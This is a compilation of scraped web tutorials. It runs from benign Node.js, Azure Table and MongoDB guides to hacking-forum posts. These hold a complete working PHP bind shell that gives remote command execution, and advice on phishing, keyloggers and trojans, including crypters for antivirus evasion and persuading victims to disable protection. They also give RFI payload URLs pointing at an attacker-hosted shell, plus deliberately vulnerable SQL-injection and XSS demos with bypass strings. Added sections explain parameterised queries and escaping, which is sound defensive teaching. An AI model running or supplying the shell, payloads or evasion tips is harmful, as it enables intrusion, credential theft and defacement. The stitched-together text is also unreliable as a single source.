JSON round trip with Node.js

One of the first things you need to do, if you’re serious about writing a RIA with a JavaScript backend, is be able to quickly send messages to and from the server. JSON is obviously the best format for JavaScript-to-JavaScript communication. So, I set up a simple example of a node.js server that can both send and receive JSON objects via AJAX, and cache them in memory on the server. The full code of the example is out on github:

I’m going to pluck out the juicy bits right here, though, and explain them.

Client To Server

The first thing you need to do is be able to POST a JSON object. This is easy enough with jQuery:

function put(id, data, callback) {
    $.ajax('http://127.0.0.1:8181/' + id + '/', {
        type: 'POST',
        data: JSON.stringify(data),
        contentType: 'text/json',
        success: function() { if ( callback ) callback(true); },
        error : function() { if ( callback ) callback(false); }
    });
}

Note that the body of the POST is not URL encoded, like that of a POSTed form: that’s verbose and wasteful, and gets us nothing since we’d have to decode it on the server anyway. Note also that I’m using JSON.stringify. This is in the ECMA-262 standard, built into modern browsers, and Douglas Crockford has written a JSON compatibility library for legacy browsers.

The next step is to receive that message on the server, inside the HTTP request handler:

http.createServer(function(request, response) {
    ...
    if ( request.method === 'POST' ) {
        // the body of the POST is the JSON payload.
        var data = '';
        request.addListener('data', function(chunk) { data += chunk; });
        request.addListener('end', function() {
            store[id] = JSON.parse(data);
            response.writeHead(200, {'content-type': 'text/plain' });
            response.end();
        });
    }
    ...
});

The request emits multiple “data” events, each carrying a piece of the JSON string, so we have to accumulate all of them into one string. When all data has been received, the “end” event is emitted and we can parse the now-complete JSON string. In this case our handling consists only of tucking the deserialized object away in the store. Afterwards, we return an empty document with a “200 OK” status.

I should probably do error handling on the JSON.parse as it’s likely to throw an exception, but I forgot. Typical error handling looks like this:

try {
    store[id] = JSON.parse(data);
} catch ( e ) {
    response.writeHead(500, {'content-type': 'text/plain' });
    response.write('ERROR:' + e);
    response.end('\n');
}

Server To Client

This is very simple. On the server, we just have to get the object out of the store, serialize it, and write it out.

if ( request.method === 'GET' ) {
    // exact id lookup.
    if ( id in store ) {
        response.writeHead(200, {'content-type': 'text/json' });
        response.write( JSON.stringify(store[id]) );
        response.end('\n');
    } else {
        response.writeHead(404, {'content-type': 'text/plain' });
        response.write('no data for ' + id);
        response.end('\n');
    }
}

Note that I’m using the mime type text/json. The official MIME type is application/json, but I’ve had trouble with frameworks treating that as unencoded binary data. You should probably use the standard, though, unless you have a good reason.

jQuery supports JSON data right out of the box, so there’s barely anything for us to do on the client:

function get(id, callback) {
    $.ajax('http://127.0.0.1:8181/' + id + '/', {
        type: 'GET',
        dataType: 'json',
        success: function(data) { if ( callback ) callback(data); },
        error : function() { if ( callback ) callback(null); }
    });
}

Conclusion

It’s easy to send JSON from the client to the server, and even easier to get it from the server to the client. There are no mismatched data types, no parsing or serialization algorithms, just two environments that speak the same language communicating in a minimal (but not trivial) subset of that language. Can you see why I’m so excited about this stuff?

Reference : http://oranlooney.com/json-round-trip/


How to Use the Table Storage Service from Node.js

This guide shows you how to perform common scenarios using the Windows Azure Table storage service. The samples are written using the Node.js API. The scenarios covered include creating and deleting a table, and inserting and querying entities in a table. For more information on tables, see the Next Steps section.

Table of Contents

What is the Table Service?
Concepts
Create a Windows Azure Storage Account
Create a Node.js Application
Configure your Application to Access Storage
Setup a Windows Azure Storage Connection
How To: Create a Table
How To: Add an Entity to a Table
How To: Update an Entity
How to: Change a Group of Entities
How to: Query for an Entity
How to: Query a Set of Entities
How To: Query a Subset of Entity Properties
How To: Delete an Entity
How To: Delete a Table
Next Steps

What is the Table Service?

The Windows Azure Table storage service stores large amounts of structured data. The service accepts authenticated calls from inside and outside the Windows Azure cloud. Windows Azure tables are ideal for storing structured, non-relational data. Common uses of Table services include:

  • Storing a huge amount of structured data (many TB) that is automatically scaled to meet throughput demands
  • Storing datasets that don’t require complex joins, foreign keys, or stored procedures and can be denormalized for fast access
  • Quickly querying data such as user profiles using a clustered index

You can use the Table service to store and query huge sets of structured, non-relational data, and your tables scale when volume increases.

Concepts

The Table service contains the following components:


  • URL format: Code addresses tables in an account using this address format:
    http://<storage account>.table.core.windows.net/<table>

    You can address Azure tables directly using this address with the OData protocol. For more information, see OData.org

  • Storage Account: All access to Windows Azure Storage is done through a storage account. The total size of blob, table, and queue contents in a storage account cannot exceed 100TB.
  • Table: A table is an unlimited collection of entities. Tables don’t enforce a schema on entities, which means a single table can contain entities that have different sets of properties. An account can contain many tables.
  • Entity: An entity is a set of properties, similar to a database row. An entity can be up to 1MB in size.
  • Properties: A property is a name-value pair. Each entity can include up to 252 properties to store data. Each entity also has three system properties that specify a partition key, a row key, and a timestamp. Entities with the same partition key can be queried more quickly, and inserted/updated in atomic operations. An entity’s row key is its unique identifier within a partition.


Node.js + MongoDB = Love: Guest Post from MongoLab


Node.js with the popular document-oriented MongoDB make for a deeply powerful and robust application platform. Or in other words, they rock.

(Note: This blog post was contributed by Ben Wen of MongoLab – a Joyent Partner and provider of MongoDB hosting, support and analytics)

Pair Joyent Cloud’s hosted node.js SmartMachine Appliance with MongoLab’s hosted MongoDB and the integration becomes downright operatic. Angels sing. Trumpets blare. Grey storm thunderheads of object-relational-mapping haze part. Revealed are golden rays of low-impedance JSON object storage and query. All in the fertile green valley of asynchronous JavaScript on the unflappable, cool bedrock of Joyent’s SmartMachine hosting platform. Songbirds tweet. Life is good. Metaphors strain.

More prosaically, the high performance asynchronous design of node.js and the tunable latency/consistency of MongoDB mean a high throughput application can be assembled in a compressed timeframe and with standard tools you probably have laying around the home. Since MongoLab runs managed hosted MongoDB instances on Joyent’s Cloud near a node.js SmartMachine, you get world-class operation of both environments.

Below, we’ll take a quick spin setting up a MongoLab database and a no.de account. We’ll build a minimalistic Web Server that can do some data inserts and queries and display it through a gratuitous 3D guestbook demo.

For the impatient

  1. Sign up at mongolab.com and create a MongoLab database on Joyent Cloud; note the database name, hostname, port, and database username/password
  2. Sign up at no.de and start a SmartMachine
  3. git clone git://github.com/mongolab/demo-node-01.git
  4. Modify config.js with database credentials and connection info from Step 1.
  5. git commit -a -m "updated config"
    git remote add mongolabdemo <your no.de machine>.no.de
    git push mongolabdemo master
  6. Point your WebGL capable browser to <your no.de machine>.no.de and enjoy.

For the really impatient

  1. Go to nodejs.mongolab.com with your WebGL compatible browser

What is MongoDB?

First a quick word about MongoDB for the newly initiated. MongoDB is a non-relational database system that emphasizes horizontal scale across multiple servers, tunable consistency, and high performance. Being a document-database, it uses JSON notation to describe data and sports a rich query language with indexes to enhance query speed. It also has a map-reduce framework for more intense data analysis and transformation. There is growing adoption of MongoDB for large stores of documents like in a Content Management System or in data analytics, for feature-rich Web 2.0 sites and games, and for persistent stores for mobile applications. Its code is open source licensed under the Gnu AGPL v3.0 and is commercially licensed from its author, 10Gen. Large corporations and smaller outfits are using MongoDB in production today. New users, you are in good company.


Bind Shell in PHP – With Authentication Feature

A bind shell, as the name suggests, is a piece of code which is used to host a shell on a server or a victim machine! It's basically used to control the host machine remotely!

In this tutorial we'll be making a bind shell in PHP with an authentication feature for extra protection.

The Code

Code: php
<?php

/*********************

@@author : lionaneesh
@@facebook : facebook.com/lionaneesh
@@Email : lionaneesh@gmail.com

********************/

?>

<html>
<head>
<title>Bind Shell — PHP</title>
</head>

<body>

<h1>Welcome to Bind Shell Control Panel </h1>

<p> Fill in the form Below to Start the Bind Shell Service </p>

<?php
if( isset($_GET[‘port’]) &&
isset($_GET[‘passwd’]) &&
$_GET[‘port’] != “” &&
$_GET[‘passwd’] != “”
)
{
$address = ‘127.0.0.1’; // As its a bind shell it will always host on the local machine

// Set the ip and port we will listen on

$port = $_GET[‘port’];
$pass = $_GET[‘passwd’];
// Set time limit to indefinite execution
set_time_limit (0);

if(function_exists(“socket_create”))
{
// Create a TCP Stream socket
$sockfd = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);

// Bind the socket to an address/port

if(socket_bind($sockfd, $address, $port) == FALSE)
{
echo “Cant Bind to the specified port and address!”;
}
// Start listening for connections
socket_listen($sockfd,15);

$passwordPrompt =
“\n=================================================================\n
PHP Bind Shell\n
\n
@@author : lionaneesh\n
@@facebook : facebook.com/lionaneesh\n
@@Email : lionaneesh@gmail.com\n
\n
=================================================================\n\n

Please Enter Password : “;

/* Accept incoming requests and handle them as child processes */
$client = socket_accept($sockfd);

socket_write($client , $passwordPrompt);

// Read the pass from the client

$input = socket_read($client, strlen($pass) + 2); // +2 for \r\n
if(trim($input) == $pass)
{
socket_write($client , “\n\n”);
socket_write($client , shell_exec(“date /t & time /t”)  . “\n” . shell_exec(“ver”) . shell_exec(“date”) . “\n” . shell_exec(“uname -a”));
socket_write($client , “\n\n”);
while(1)
{
// Print Command prompt
$commandPrompt =”(Bind-Shell)[$]> “;
$maxCmdLen = 31337;
socket_write($client,$commandPrompt);
$cmd = socket_read($client,$maxCmdLen);
if($cmd == FALSE)
{
echo “The client Closed the conection!”;
break;
}
socket_write($client , shell_exec($cmd));
}
}
else
{
echo “Wrong Password!”;
socket_write($client, “Wrong Password , Please try again \n\n”);
}
socket_shutdown($client, 2);
socket_close($socket);
}
else
{
echo “Socket Conections not Allowed/Supported by the server! <br />”;
}
}
else
{
?>
<table align=”center” >
<form method=”GET”>
<td>
<table style=”border-spacing: 6px;”>
<tr>
<td>Port</td>
<td>
<input style=”width: 200px;” name=”port” value=”31337″ />
</td>
</tr>
<tr>
<td>Passwd </td>
<td><input style=”width: 100px;” name=”passwd” size=’5′ value=”lionaneesh”/>
</tr>
<tr>
<td>
<input style=”width: 90px;” class=”own” type=”submit” value=”Bind :D!”/>
</td>
</tr>

</table>
</td>
</form>
</tr>
</table>
<p align=”center” style=”color: red;” >Note : After clicking Submit button , The browser will start loading continuously , Dont close this window , Unless you are done!</p>
<?php
}
?>

 

Using

The bind shell is implemented to be simple to understand and easy to use! The introduction page is quite self-explanatory and will tell you everything you need to know!

Here is a Screen Shot of its working :-

Enjoy !!!

Reference : http://www.go4expert.com/forums/showthread.php?t=26855

Complete HACKING information

Introduction:

We see millions of people going to different forums and websites and asking “how do I hack an email?” or “Can you hack blah for me?”. So I thought I would create a tutorial which gives you the basic idea of what the heck a “HACK” is, and how to DEFEND YOURSELF AGAINST HACKERS.

Disclaimer:

As I have seen controversies in the past, here is the disclaimer.

Neither I nor the staff of Go4expert.com take any responsibility if you use this tutorial in an unethical way. This is written to help you be aware of what's going around, and to save yourself from being hacked!

Background:

Hacking started way back when Windows 98 was designed. Hacking is basically finding the loop holes and trying to leak some information out of them, which may lead you to critical information like passwords or credit card details. Sometimes hacking is done just because of personal offenses.

Things to remember

I suggest you KEEP READING ARTICLES AND TUTORIALS FROM GOOD SITES. THAT'S THE ONLY WAY YOU CAN LEARN.

Initialization:

Getting back to the main point, I am going to briefly discuss some of the ways of hacking. Hacking is basically bifurcated into 2 major parts.

1. Email or the user information
2. Web based hacking.

Email or user information:

These days the most commonly used and famous ways of hacking user information like emails, passwords and credit card details are as follows:

a. Phishing
b. Brute Forcing
c. Keylogging
d. Trojans

a. Phishing:

Phishing is basically a massive attack. What a hacker does is create an absolutely look-alike page of some website like Yahoo or Gmail. They upload it to their own server and give the link to some n00b user. When the user opens it, they think they are on the Yahoo or Gmail page, they put in their username and password, click on submit and WHOA! your information has been submitted. This is widely used by new people trying to enter the hacking world.
The most recent example in India was some scam with ICICI bank; lots of user info was stolen, as far as I remember. I read it somewhere in the newspaper and was thinking what the hell!?

Disadvantages: Still, many people give it a try before going for phishing, because the only problem with phishing is that even if the victim knows a little about the internet, he will read the URL and understand that it is not a genuine website.

b. Brute Forcing

A brute forcer is basically a program which could be called a “cracker”. In a brute forcer you put in the username you want to hack, and as the password you give it a text file which has almost all of the existing English words in it. What it does is try each and every word from that file and see if anything matches. You might have noticed topics like “huge pass list” on different forums; they are nothing but password lists to put into your bruteforcer!

Disadvantages:
1. Sometimes brute forcing may just go on for ages!
2. It isn't guaranteed.
3. These days many people have alpha-numeric-symbol passwords which are really tough for a brute forcer to crack.
4. Most of the famous sites like Yahoo and Gmail are designed in such a way that they put up an “image captcha” after 3 incorrect login attempts, which stops the bruteforcer.

P.S.: I have made some focused FTP, Gmail & Yahoo bruteforcers which are available on my website.

c. Keylogging

A keylogger helps you create a little file which is known as the “server”. You have to send your server to the victim; he has to click on it and then YOU'RE DONE! This is what happens.
Best possible way to hack someone. Keyloggers are basically programs which install themselves on your victim's computer, keep recording each and every keystroke the victim presses on his keyboard, and send it to the hacker. There are many ways to receive the keystrokes, i.e. FTP, email, messengers. According to me this is the best way to trick your victim and get their information.

Disadvantages:
1. When the victim receives the keylogger, in most cases their anti-virus will auto-delete it. So you have to convince them to disable the anti-virus by bluffing something.
2. Sometimes a firewall blocks the keylogs from being sent.

Tips:
1. There are some programs known as “crypters” which will help you make your servers undetectable, so your victim's anti-virus would not be able to detect them.

d. Trojans:

Trojans are like the father of keyloggers. A trojan sends you the keylogs just as keyloggers do; on top of that, it lets you take control of the victim's computer: edit / delete / upload / download files from or to their computer. Some more funny features: it will make their keyboard go mad, it may keep on ejecting and re-inserting the CD ROM. Much more..

Disadvantages :
Same as keyloggers.

Tips :
Same as keylogger.

Web Hacking:

I will discuss some of the most commonly used web hacking techniques which help hackers hack any website. This will help you SAVE YOUR SITE!

1. SQL Injection
2. XSS
3. Shells
4. RFI
5. There are some more but they are TOO big to be discussed here.

1. SQL Injection:

Most websites these days are connected to an SQL database, which helps them store usernames and passwords [encrypted] when a guest registers on their website. The SQL database processes a query every time a user logs in. It goes to the database, validates the password; if it's correct then it logs the user in and if not then it gives an error.
So the basic funda is executing a command to parse a query in the database to try to extract information from the database. I can't really put the entire tutorial here because this is the most complicated way to hack a website!

P.S.: If you want to check whether YOUR website is vulnerable to an SQL injection attack or not, do the following.

If your site’s URL is:

Code:
 yoursite.com/index.php?id=545

just add a ‘ like this at the end

Code:
 yoursite.com/index.php?id=545'

2. XSS:

XSS is another nice way to hack some website. Suppose some website/forum allows HTML in posts or articles; then a hacker can post a malicious script into the content. So whenever a user opens up the page, the cookies would be sent to the hacker. So he can log in as that user and f*ck the website up.

3. Shells:

A shell is a malicious .php script. What you have to do is find a place on any website where you can upload any file, like avatars, recipes, your tricks, your feedback, and try to upload your shell file from there. If it's uploaded then WHOA! you open it from the URL bar and you can see the entire “FTP” account of that webhosting. You can rename/edit/upload/download anything you want, including the index page.
This is also known as defacing.

4. RFI:

RFI is a good way to deface a website. It is used together with a shell. Suppose you have uploaded your shell at:

Code:
 yoursite.com/shell.txt

and you found a site vulnerable to RFI... then you can do as follows:

Code:
 victimssite.com/index.php?page=yousite.com/shell.txt

This will again give you access to your victim's site's FTP, just as a shell does, so you can f*ck up anything you want.

P.S.: If you want to check whether YOUR website is vulnerable to an RFI attack or not, do the following.

If your site’s URL is:

Code:
 yoursite.com/index.php?id=545

just add something like this at the end

Code:
 yoursite.com/index.php?id=http://www.google.com

And if it includes the Google page into your page, that means it's vulnerable to RFI.

Reference : http://www.go4expert.com/forums/showthread.php?t=16514

Understanding Basic SQL Injection

SQL injection (also known as SQLI) is a code injection technique that occurs if the user-defined input data is not correctly filtered or sanitized of the ‘string literal escape characters’ embedded in SQL.

Basically SQLI is a way of injecting and executing arbitrary SQL statements. The whole idea is to make the application execute our arbitrary code, which was never intended. In this tutorial we'll be looking at how a basic SQL code injection can cause the application to mess up its login authentication, which would eventually lead to data access. So what are we waiting for? Let's get started.

Authentication Bypass (SQL injection)

Most of the authentication scripts you'll find on the web are not secured, and although this vulnerability first appeared in the 1990s there are still many applications vulnerable to this attack.

How does SQL injection work?

This attack simply exploits a bad filtering or sanitizing mechanism in the database layer of an application; this vulnerability gives attackers room to alter the SQL code that gets executed.

For example, you have a basic SQL statement as follows:

Code:
  SELECT * FROM Users where Name = 'UserInput';

Now if the page is vulnerable to this kind of attack then an attacker has room to alter this SQL statement.
For example the attacker can simply add

Code:
  ' or '1' = '1

Which would result in:

Code:
  SELECT * FROM Users where Name = '' or '1' = '1'

Now if you know some basic SQL you can see that the application will be forced to return all the users in the table, as the statement now includes an OR condition, i.e. '1' = '1', which will always be true.

Demonstration

To demonstrate a basic SQL authentication bypass attack I have created a set of PHP scripts.

defines.php

Code:
  <?php
  $tableName = "badlogin";
  $dbName    = "sqlnjection";
  $sqlServer = "localhost";
  $sqlUser   = "root";
  $sqlPass   = "";
  ?>

functions.php

Code:
<?php
require "defines.php";

function checkTable()
{
	global $tableName;
	$query = "SELECT * from $tableName";
	// No die() here: a failed query just means the table does not exist yet.
	$result = mysql_query($query);
	if($result == FALSE) // table is not created yet
		createTable();
}
function createTable()
{
	global $tableName;
	$query = "CREATE TABLE $tableName(login char(50),pass char(50))";
	$result = mysql_query($query) or die(mysql_error());
	$query = "INSERT INTO $tableName(login,pass) values('admin','UnCrACkAbLe')";
	$result = mysql_query($query) or die(mysql_error());
}
function checkCredentials($login,$pass)
{
	global $tableName;
	// Deliberately vulnerable: $login and $pass are pasted straight into the SQL text.
	$query = "SELECT * FROM $tableName WHERE login='$login' AND pass='$pass';";
	//            echo "<br/>$query<br/>";
	$result = mysql_query($query) or die(mysql_error());
	$rowsnum = mysql_num_rows($result);
	if($rowsnum > 0)
	{
		congrats();
	}
}
function congrats()
{
	echo"<p class='warning'>Congratulations You just completed the Challenge...</p>";
	echo"<script type='text/javascript'>alert('Mission Completed');</script>";
	// The redirection and Points award code should go here
}
?>

sqlInjection.php

Code:
<?php
require "defines.php";
require "functions.php";
?>
<html>
<head>
	<title>Bad Login</title>
	<link href='style.css' type='text/css' rel='stylesheet'/>
</head>
<body>
	<h1>Welcome to bad Login Please Enter your Credentals</h1>
	<form method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>">
	<table align="center">
		<tr>
			<td>Login</td>
			<td> : <input type="text" name="login"/></td>
		</tr>
		<tr>
			<td>Password</td>
			<td> : <input type="text" name="email"/></td>
		</tr>	
		<tr>
			<td><input type="submit" name="go"/></td>
		</tr>
	</table>
	</form>
<?php
if( isset($_POST['login']) && isset($_POST['email']) && isset($_POST['go']) )
{
	mysql_connect("$sqlServer","$sqlUser","$sqlPass") or die(mysql_error());
	mysql_select_db("$dbName") or die(mysql_error());
	//checking if table exists
	checkTable(); // checks if the table exists and creates it if not found
	checkCredentials($_POST['login'],$_POST['email']);
}
?>

</body>
</html>

Constructing the Attack String :-

Our main purpose in this scenario is to exploit the vulnerability in the above set of pages and gain access to the 'admin' account. We can simply do that in the following ways:

  1. Giving “admin'#” as the username to the application. This means that after writing admin as the username we used '#' to comment out any other code after it.
  2. Giving “admin” as the username and “' or '1' = '1” as the password. This tricks the application into using an 'or always true' condition, which results in an authentication bypass.
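To see concretely what these two attack strings (and the lone `'` used as a test in the earlier web-hacking post) do to the query built in functions.php, and what parameterisation changes, here is an added example in JavaScript; it is not the article's PHP and not part of the original post. `unsafeQuery` builds the statement exactly the way `checkCredentials` does. `queryShape` is a small scanner of my own that counts single-quoted literals and spots a `#` or `--` comment outside a literal, so the structural change each payload causes becomes visible. `safeQuery` returns the statement with `?` placeholders and the values separately, the shape a prepared-statement API such as PDO or mysqli takes, so the statement text is identical whatever the user types. The table name comes from the article's defines.php; the sample inputs are constructed.

```javascript
'use strict';

const TABLE = 'badlogin'; // table name from the article's defines.php

// The vulnerable construction from checkCredentials(): user input is spliced into SQL text.
function unsafeQuery(login, pass) {
  return `SELECT * FROM ${TABLE} WHERE login='${login}' AND pass='${pass}';`;
}

// The parameterised form: SQL text is fixed, values travel separately.
function safeQuery(login, pass) {
  return { text: `SELECT * FROM ${TABLE} WHERE login=? AND pass=?;`, values: [login, pass] };
}

// Minimal scanner for MySQL-style single-quoted literals ('' is an escaped quote).
// Reports how many literals the statement has, whether a # or -- comment starts
// outside a literal, and whether the last literal is left unterminated.
function queryShape(sql) {
  let literals = 0;
  let inLiteral = false;
  let comment = false;
  for (let i = 0; i < sql.length; i++) {
    const c = sql[i];
    if (inLiteral) {
      if (c === "'") {
        if (sql[i + 1] === "'") i++; // escaped quote, stay inside the literal
        else inLiteral = false;
      }
    } else if (c === "'") {
      inLiteral = true;
      literals++;
    } else if (c === '#' || (c === '-' && sql[i + 1] === '-')) {
      comment = true;
      break; // the server ignores the rest of the statement
    }
  }
  return { literals, comment, unterminated: inLiteral };
}

// True when a query built from this input still has the shape the developer
// wrote: exactly two literals, no comment, nothing unterminated.
function keepsIntendedShape(login, pass) {
  const s = queryShape(unsafeQuery(login, pass));
  return s.literals === 2 && !s.comment && !s.unterminated;
}

// Constructed inputs: a normal login, the two bypass strings from the article,
// and the lone-quote probe from the earlier post.
const SAMPLES = [
  { login: 'admin', pass: 'UnCrACkAbLe' },
  { login: "admin'#", pass: 'anything' },
  { login: 'admin', pass: "' or '1' = '1" },
  { login: "545'", pass: '' },
];

// One boolean per sample: does the concatenated query keep its intended shape?
function auditSamples(samples = SAMPLES) {
  return samples.map((s) => keepsIntendedShape(s.login, s.pass));
}
```

For the first bypass the scanner sees one literal and then a comment, so the `AND pass=...` clause is gone; for the second it sees four literals, the extra two being the always-true `'1' = '1'`; for the lone quote it sees an unterminated literal, which is the syntax error that reveals the injection point. `safeQuery` yields the same two-placeholder text for all four inputs, because the values never become part of the SQL grammar.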

 

Reference : http://www.go4expert.com/forums/showthread.php?t=26236

Basics of XSS or Cross Site Scripting Explained

Cross Site Scripting, also known as XSS, is a popular type of client-side attack. It occurs in web applications and allows an attacker to inject client-side scripts of their choosing into web pages viewed by other users.

Types of XSS
This attack is mainly of 2 types

Non-Persistent

This type of attack is carried out by injecting some client-side code into a vulnerable URL. The attacker can then spread this URL and send it to his/her victims by means of some social engineering etc.; on clicking these links the victims unknowingly execute the injected code, which in turn can result in cookie stealing, privacy disclosure etc.

Persistent

This type of attack is more dangerous. It occurs when the data provided by the attacker is stored by the server and is served as a normal page to normal users.
The attacker can then simply inject some malicious client-side code, which in turn can result in defacement of the website, cookie stealing, privacy disclosure etc.

Demo

Now that we know something about what these vulnerabilities are and how they occur, let's actually take a look at an example and how to test it!
Xss.php

Code: php
<html>
<head>
<title>Vulnerable to XSS</title>
</head>
<body>
<h1>Welcome to XSS Demo Page</h1>

<p>The Data Entered is As Follows :- </p>

<?php

/**
* @author lionaneesh
* @copyright 2011
*/

if(isset($_GET['data']))
{
$data = $_GET['data'];
}
else
{
$data = "No Data Entered !";
}

echo "<i>$data</i>"; // unescaped output: the vulnerable line fixed below

?>

</body>
</html>

Now Just Go to :-

Site.com/path/xss.php?data=<script>alert(“XSS”);</script>

And See what happens!

Wow! An Alert box saying XSS will appear proving that your injected code actually executed! Now this is just an example of how these vulnerabilities can occur in web-applications and how you can test them!

How to Fix Them

If you're one of the people whose site is vulnerable to this type of attack, I recommend fixing it as soon as possible. For the scope of this tutorial I'll only be covering how these vulnerabilities can be fixed in PHP; if you are using some other language, I recommend you check your language reference or contact me.

PHP provides a function called htmlspecialchars() which converts special characters into their HTML entities. Now we'll just use this in the above code and check what happens.
Xss.php (line number 33)

Code: php
echo htmlspecialchars("<i>$data</i>");

Now let’s once more Go to :-

Site.com/path/xss.php?data=<script>alert(“XSS”);</script>

And See what happens!

Voila! You can notice the change now!
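The escaping behind that fix, as an added example that is not part of the original post and is written in JavaScript rather than the post's PHP: `escapeHtml` does what htmlspecialchars() does with ENT_QUOTES, turning the five characters that can change HTML structure into entities. It is applied to the `data` parameter from this post and would equally neutralise the script posted into content in the earlier web-hacking post. Two renderings are shown: `renderData` escapes only the user-supplied text, which is what a page should do, and `renderDataArticleFix` escapes the whole `<i>...</i>` string as the article does, which also turns the developer's own tags into visible text. The function names and the attribute example are my own.

```javascript
'use strict';

// JavaScript equivalent of PHP's htmlspecialchars($s, ENT_QUOTES): the five
// characters that can change HTML structure become entities.
const ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };

function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ENTITIES[c]);
}

// Renders the "data" parameter the way xss.php should: the markup is the
// developer's, only the user-supplied text is escaped.
function renderData(data) {
  return '<i>' + escapeHtml(data) + '</i>';
}

// The article's fix escapes the whole string, tags included, so the visible
// page shows literal "<i>" characters. Kept here for comparison.
function renderDataArticleFix(data) {
  return escapeHtml('<i>' + data + '</i>');
}

// Text placed inside a quoted attribute needs the same escaping; the quote
// entities are what stop a value from ending the attribute early.
function renderAsTitle(data) {
  return '<span title="' + escapeHtml(data) + '">data</span>';
}

// Crude output check: does a <script or </script tag survive in the HTML?
function containsScriptTag(html) {
  return /<\/?script/i.test(html);
}

// Constructed sample: the probe string from the article.
const PROBE = '<script>alert("XSS");</script>';
```

Running `renderData(PROBE)` gives `<i>&lt;script&gt;alert(&quot;XSS&quot;);&lt;/script&gt;</i>`: the browser shows the probe as text, and no script tag is left in the markup. The escaping is for HTML body and attribute text only; a value going into a URL, a JavaScript block or a CSS rule needs the encoding for that context instead.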

Reference : http://www.go4expert.com/forums/showthread.php?t=26878